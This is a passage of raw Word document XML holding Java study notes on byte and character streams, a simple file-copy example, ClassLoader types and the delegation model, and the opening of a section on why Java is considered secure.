            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="00F33D7D" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47F056F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byte array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="2D03995E" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E8A8DC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Java objects from a stream (used in serialization)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E1F7BD8"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CE4B95" w14:paraId="740B093A" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DF749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2A97C08B" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="666DFCA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to a file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="258C92DC" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1AC25C3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efficiently using a buffer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="502C0343" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CEAC2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to a byte array</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="0D7F7D70" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4386094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Java objects to a stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EFBF99E"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imple Example: Reading a file using Byte Stream</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D08D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p>
    <w:p w14:paraId="4BC3C31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p>
    <w:p w14:paraId="301F6255"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0C13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5D6690"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yteStream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491A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4B0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BC891E"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txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E50A8F"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txt"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD2CE71"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468B43"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yteData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4159446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yt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1428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yteData</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8260E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CD582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 copied successfully using byte stream."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19BC04AC"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C03E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0FF02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232F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A60DA6" w14:textId="16AC41A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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E1F8D"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en to Use Byte Stream?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66039176"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with non-textual data (images, videos, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E19B190"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process data byte by byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6957609F" w14:textId="6DE53B1D"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ealing with platform-independent binary formats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5822928B"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CE4B95" w14:paraId="585F6466" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="218DB993"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 Stream (Reader/Writer)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="0CD9A040" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E9B86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bit characters (text)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="329E1933" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13E57F69"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xt files, character data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007F1325" w:rsidRPr="00CE4B95" w14:paraId="5B9D832E" w14:textId="77777777" w:rsidTr="007F1325">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7639786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er, Writer</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D4735B" w14:textId="38FCB4A1" w:rsidR="007F1325" w:rsidRPr="00CE4B9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CE4B95" w:rsidRDefault="00D16FEC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc197867220"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Classloader? Different types of it?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w14:paraId="72A1485A" w14:textId="421D59D6" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB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is a part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Runtime Environment (JRE)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> responsible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>loading .class files</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into memory </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>at runtime</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3061A593"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doesn't load all classes at once — it loads them </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>on demand</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, and the ClassLoader is what performs that task.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D19BC10" w14:textId="1770131F" w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00DB24C2" w:rsidP="00724FB3">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F508C7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lass Loading Process (High-Level)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6029F5EA"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oad</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – The class file is located and loaded into memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CC0ACB"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ink</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – It verifies, prepares, and optionally resolves the class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C6E017"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Initialize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Static blocks and static variables are initialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028FC41A"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Types of ClassLoaders in Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CF9D4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has a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hierarchical delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">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CE4B95" w14:paraId="70AD72E2" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D0B044"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ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B06D887"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Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="1BED91D5" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="491D2FA7"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ootstrap ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FB9F4B4"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w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>core Java classes</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the rt.jar (like java.lang.*)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="5FF7B384" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04005659"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xtension ClassLoader</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1BFD502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Loads classes from the ext directory ($JAVA_HOME/lib/ext)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB24C2" w:rsidRPr="00CE4B95" w14:paraId="0B1D99A8" w14:textId="77777777" w:rsidTr="00DB24C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CAEAB44"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classes from the </w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>classpath</w:t>
            </w:r>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., your app code)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="099C7643"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ClassLoaders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52718C9B"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legation Hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDFF585"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class is requested to be loaded, the process follows this </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>parent-first delegation model</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328D2FF1" w14:textId="272C11C2" w:rsidR="000D73AA" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>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otstra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p>
    <w:p w14:paraId="0869552A"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Each loader </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>delegates to its parent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> before trying to load the class itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF4E1FB"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Get the ClassLoader of a Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="134D74C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8602D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288278"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c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Loader</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6222198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assLoad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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513AF58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18C25" w14:textId="054A8951"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19D100"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Use Cases of ClassLoader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D669CF"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Hot deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in application servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A612E0"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Dynamic loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of plugins/modules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2EEBC6"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Custom loading</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of encrypted/obfuscated classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F17E0F3"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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Used heavily in frameworks like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring</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bernat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mcat</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D43826" w14:textId="52550467" w:rsidR="006767AE" w:rsidRPr="00CE4B95"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CE4B95" w:rsidRDefault="004C1F2C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc197867221"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Why is java more secure?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="5A4E27BF" w14:textId="194C4AB5" w:rsidR="004C1F2C" w:rsidRPr="00CE4B95" w:rsidRDefault="00F537F6" w:rsidP="00DE4CF6">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as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>designed with security in mind</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the start. Here's how it achieves that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C7960" w14:textId="355F6E3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1. No Pointer Arithmetic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49158A"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t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doesn't allow direct memory access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> using pointers like C/C++.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DCC3BC8"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Prevents buffer overflows, memory corruption, and access to arbitrary memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23371FAD" w14:textId="0667E92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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2. Automatic Memory Management (Garbage Collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C70724"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Reduces memory leaks and dangling pointer issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3269BB02"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JVM handles allocation and deallocation safely.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3807C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3. Bytecode Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585C6CD7"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 xml:space="preserve">Before execution, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java bytecode is verified</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
